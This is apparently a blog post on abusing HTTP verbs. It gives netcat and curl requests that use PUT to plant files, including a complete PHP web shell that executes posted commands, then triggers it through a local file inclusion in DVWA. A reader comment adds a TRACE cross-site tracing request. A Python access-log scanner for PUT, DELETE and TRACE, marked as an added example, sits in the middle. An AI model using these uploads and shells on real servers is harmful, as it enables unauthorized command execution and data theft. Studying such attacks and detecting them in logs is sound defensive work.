Exploiting HTTP Verbs

The HTTP protocol comprises the following verbs or methods.

  • GET
  • HEAD
  • POST
  • PUT
  • DELETE
  • CONNECT
  • OPTIONS
  • TRACE

I assume you are well aware of these; you can read more about them in detail in the RFC documents listed in the references.

I will show some interesting HTTP verbs which can be used to break into servers. Well, these attacks can be quite rare, but I thought of sharing 🙂

OPTIONS

If the OPTIONS verb is enabled on the server, it can be used to view all the HTTP methods that are configured.

% nc localhost 80
OPTIONS / HTTP/1.0

HTTP/1.1 200 OK
Allow: OPTIONS, TRACE, GET, HEAD, POST
Server: Microsoft-IIS/7.5
Public: OPTIONS, TRACE, GET, HEAD, POST
X-Powered-By: ASP.NET
Date: Sun, 14 Jun 2015 05:31:10 GMT
Connection: close

DELETE

The DELETE verb is a dangerous verb and can be misused. If it is misconfigured, it can be used to delete resources from the web server.

% nc localhost 80
DELETE  /location/resource HTTP/1.0

Date: Sun, 14 Jun 2015 05:01:22 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=ete39c4b0uk83phvucj1ftbsn5; expires=Mon, 15 Jun 2015 05:01:22 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8

PUT

This verb can be used to upload a resource to the server. It is also a risky verb if not configured appropriately. For example, suppose we want to write "<?php echo 'Hello World'; ?>" into a new file named "hello.php". Make sure you give the correct Content-Length for your payload.

%  cat -e hello.php 
<?php echo 'Hello World'; ?>$

% wc -m hello.php 
29 hello.php

% nc localhost 80
PUT /hello.php HTTP/1.0
Content-Type: text/html
Content-Length: 29

<?php echo 'Hello World'; ?>

PUT verb in PHP

PHP supports the PUT verb. This is a sample program which receives the data from a PUT request and saves it as "myfile".

<?php
    // Read the raw request body (the PUT payload) from php://input
    $putdata = fopen("php://input", "r");
    // Open the destination file for writing; it is created relative to this script
    $fp = fopen("myfile", "w");
    // Copy the body into the file in 1 KB chunks until fread returns nothing
    while ($data = fread($putdata, 1024)) fwrite($fp, $data);
    fclose($fp);
    fclose($putdata);
?>

I will save this as "put.php" in the root directory of the web server.
Now we can request "put.php" using the PUT verb and send our payload.

% cat -e phpinfo.php 
<?php phpinfo(); ?>$

% wc -m phpinfo.php 
20 phpinfo.php

% nc 192.168.1.5 80
PUT /put.php HTTP/1.0
Content-Type: text/html
Content-Length: 20

<?php phpinfo(); ?>
HTTP/1.1 200 OK
Date: Mon, 15 Jun 2015 06:48:16 GMT
Server: Apache/2.4.7 (Win32) OpenSSL/0.9.8y PHP/5.4.22
X-Powered-By: PHP/5.4.22
Content-Length: 0
Connection: close
Content-Type: text/html

Now if you view "myfile", our payload should be nicely written into it.
Suppose you have a local file inclusion situation; in cases like that we can include the file we have just written using PUT.
This is an example of local file inclusion. I’ll be using DVWA to demonstrate this.

<?php
    echo "File included: ".$_REQUEST["page"]."<br>";
    $file = $_REQUEST["page"];
    include $file;
?>

http://localhost/dvwa/vulnerabilities/fi/?page=../../../myfile

Suppose we want to upload a simple web shell; we can do it like the following 😉

% wc -m shell.php 
189 shell.php

% nc 192.168.1.5 80
PUT /put.php HTTP/1.0
Content-Type: text/html
Content-Length: 189

<?php

print '<form method="post">
Command: <input type="text" name="__"><br>
<input type="submit">
</form>';

if(isset($_POST["__"]))
	print '<pre>'.shell_exec($_POST["__"]).'</pre>';

?>
HTTP/1.1 200 OK
Date: Mon, 15 Jun 2015 07:39:42 GMT
Server: Apache/2.4.7 (Win32) OpenSSL/0.9.8y PHP/5.4.22
X-Powered-By: PHP/5.4.22
Content-Length: 0
Connection: close
Content-Type: text/html 

After that include our “myfile” and you can execute commands on the server.

You can also use curl to upload a file using PUT easily.

% curl http://192.168.1.5/put.php --upload-file shell.php -v
* About to connect() to 192.168.1.5 port 80 (#0)
*   Trying 192.168.1.5...
* connected
* Connected to 192.168.1.5 (192.168.1.5) port 80 (#0)
> PUT /put.php HTTP/1.1
> User-Agent: curl/7.26.0
> Host: 192.168.1.5
> Accept: */*
> Content-Length: 189
> Expect: 100-continue
> 
* additional stuff not fine transfer.c:1037: 0 0
* HTTP 1.1 or later with persistent connection, pipelining supported
< HTTP/1.1 100 Continue
* additional stuff not fine transfer.c:1037: 0 0
* We are completely uploaded and fine
* HTTP 1.1 or later with persistent connection, pipelining supported
< HTTP/1.1 200 OK
< Date: Mon, 15 Jun 2015 07:47:44 GMT
< Server: Apache/2.4.7 (Win32) OpenSSL/0.9.8y PHP/5.4.22
< X-Powered-By: PHP/5.4.22
< Content-Length: 0
< Content-Type: text/html
< 
* Connection #0 to host 192.168.1.5 left intact
* Closing connection #0
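From the defending side, the verbs shown in the OPTIONS, DELETE, PUT and TRACE sections above all leave a trace in the web server's access log. The following Python checker is an added example (not part of the original post) that walks Apache combined-format log lines and flags PUT, DELETE and TRACE requests, a PUT whose target is a server-side script, and whether the server answered with a 2xx status, i.e. actually accepted the request. The log lines are constructed samples modelled on the requests in this post, not real logs.

```python
import re
from typing import Dict, List, Optional

# Apache "combined" access-log format. The request line is what carries the verb.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)

# Verbs the post shows being abused; most applications never need them from clients.
RISKY_METHODS = {"PUT", "DELETE", "TRACE"}
# Extensions whose upload via PUT means code, not content, landed on the server.
SCRIPT_EXT = re.compile(r'\.(php\d?|phtml|asp|aspx|jsp)$', re.IGNORECASE)

def classify(line: str) -> Optional[Dict[str, str]]:
    """Return a finding for one log line, or None if the line is benign."""
    m = LOG_RE.match(line)
    if not m:
        return None
    method, path, status = m["method"], m["path"], m["status"]
    reasons: List[str] = []
    if method in RISKY_METHODS:
        reasons.append(f"{method} request")
    if method == "PUT" and SCRIPT_EXT.search(path.split("?", 1)[0]):
        reasons.append("PUT of a server-side script")
    if method in {"PUT", "DELETE"} and status.startswith("2"):
        reasons.append(f"server accepted it ({status})")
    if not reasons:
        return None
    return {"ip": m["ip"], "method": method, "path": path,
            "status": status, "reason": "; ".join(reasons)}

def scan(lines) -> List[Dict[str, str]]:
    """Run classify over every line and keep only the findings."""
    return [hit for hit in (classify(l) for l in lines) if hit]
# Constructed sample lines modelled on the requests in the post (not real logs).
SAMPLE_LOG = """\
192.168.1.10 - - [14/Jun/2015:05:31:10 +0000] "OPTIONS / HTTP/1.0" 200 0 "-" "-"
192.168.1.10 - - [14/Jun/2015:05:01:22 +0000] "DELETE /location/resource HTTP/1.0" 403 199 "-" "-"
192.168.1.10 - - [15/Jun/2015:06:48:16 +0000] "PUT /put.php HTTP/1.0" 200 0 "-" "-"
192.168.1.10 - - [15/Jun/2015:06:50:00 +0000] "PUT /hello.php HTTP/1.0" 201 0 "-" "curl/7.26.0"
192.168.1.10 - - [17/Jun/2015:07:58:18 +0000] "TRACE / HTTP/1.1" 200 - "-" "curl/7.26.0"
10.0.0.7 - - [15/Jun/2015:07:00:00 +0000] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
""".splitlines()

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(f'{hit["ip"]} {hit["method"]} {hit["path"]} -> {hit["reason"]}')
```

A 403 on the DELETE line shows the server refused it, while the 2xx on the PUT lines is the signal that the script handler or a misconfigured server actually stored the body.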

Thanks for reading !

References

[1] http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
[2] https://tools.ietf.org/html/rfc7231


5 thoughts on “Exploiting HTTP Verbs”

    • In TRACE method you can inject your own header for example:

      root@kali:~/temp# curl -v -X TRACE -H "X-Header: Osanda" Host.com
      * About to connect() to Host.com port 80 (#0)
      * Trying 1.1.1.1...
      * connected
      * Connected to Host.com (1.1.1.1) port 80 (#0)
      > TRACE / HTTP/1.1
      > User-Agent: curl/7.26.0
      > Host: Host.com
      > Accept: */*
      > X-Header: Osanda
      >
      * additional stuff not fine transfer.c:1037: 0 0
      * HTTP 1.1 or later with persistent connection, pipelining supported
      < HTTP/1.1 200 OK
      < Date: Wed, 17 Jun 2015 07:58:18 GMT
      < Server: Apache/2.2.3 (CentOS)
      < Connection: close
      < Transfer-Encoding: chunked
      < Content-Type: message/http
      <
      TRACE / HTTP/1.1
      User-Agent: curl/7.26.0
      Host: Host.com
      Accept: */*
      X-Header: Osanda

      This can lead to stealing of cookies even if the HttpOnly flags are set.
      More information on XST attacks:
      https://www.owasp.org/index.php/Cross_Site_Tracing
